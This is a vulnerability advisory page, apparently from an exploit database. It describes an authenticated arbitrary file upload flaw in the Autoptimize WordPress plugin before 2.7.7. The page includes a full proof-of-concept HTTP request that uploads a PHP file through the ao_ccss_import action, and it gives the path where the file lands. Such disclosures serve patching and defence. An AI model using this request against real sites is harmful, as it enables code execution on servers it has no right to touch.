Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitNguyen Van KhanhWPEX-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0
HistoryAug 24, 2020 - 12:00 a.m.

Autoptimize < 2.7.7 - Authenticated Arbitrary File Upload

2020-08-2400:00:00
Nguyen Van Khanh
12
JSON

The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.

https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080
Content-Length: 504
Connection: close
Cookie: [Admin Cookies]

-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/zip

<?php phpinfo() ?>
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="action"

ao_ccss_import
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="ao_ccss_import_nonce"

6df2d6b321
-----------------------------161325441624547204062709166080--


Even if the request generates an error 500 (for example when PHP ZipArchive is not installed), file will be at /wp-content/uploads/ao_ccss/rce.php

Related

prion 3
wpvulndb 1
cve 3
packetstorm 1
patchstack 1
openvas 1
prion
prion
Command injection
2020-09-03 15:15:00
Race condition
2021-06-21 20:15:00
Design/Logic Flaw
2021-06-21 20:15:00
wpvulndb
wpvulndb
Autoptimize < 2.7.7 - Authenticated Arbitrary File Upload
2020-08-24 00:00:00
cve
cve
CVE-2020-24948
2020-09-03 15:15:00
CVE-2021-24377
2021-06-21 20:15:00
CVE-2021-24376
2021-06-21 20:15:00
packetstorm
packetstorm
WordPress Autoptimize Shell Upload
2021-01-08 00:00:00
patchstack
patchstack
WordPress Autoptimize plugin <= 2.7.6 - Authenticated Arbitrary File Upload vulnerability
2020-08-24 00:00:00
openvas
openvas
WordPress Autoptimize Plugin <= 2.7.6 RCE Vulnerability
2020-09-08 00:00:00
JSON
Related for WPEX-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0
prion3wpvulndb1cve3packetstorm1patchstack1openvas1